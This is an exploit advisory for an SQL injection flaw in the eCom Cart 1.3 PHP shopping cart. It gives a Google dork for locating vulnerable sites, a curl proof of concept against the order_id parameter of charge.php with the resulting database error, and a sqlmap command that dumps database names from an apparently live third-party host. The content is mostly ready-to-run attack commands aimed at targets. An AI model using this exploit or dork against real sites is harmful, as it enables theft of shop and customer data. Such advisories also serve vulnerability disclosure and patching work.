[出自:jiwo.org] # Exploit Title: eCom Cart 1.3 Exploit

# Google Dork: inurl:"/pdetails/11" ([11] is variable)

# Date: 10.06.2017

# Exploit Author: Alperen Eymen Ozcan & Batuhan Camci

# Vendor Homepage: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007

# Software Link: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007

# Version: 1.3

# Tested on: Linux

 

 

 

$ curl http://localhost/ecom-cart/charge.php -d order_id=%271

 

Fatal error: Uncaught PDOException: SQLSTATE[42000]: Syntax error or access

violation: 1064 You have an error in your SQL syntax; check the manual

that corresponds to your MariaDB server version for the right syntax

to use near '1'' at line 1 in

/customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php:16

Stack trace:

#0 /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php(16):

PDO->query('SELECT * FROM 3...')

#1 {main}

  thrown in /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php

on line 16

 

$ sqlmap -u "http://www.lobisdev.one/ecom-cart/charge.php' --data=order_id=1 --dbs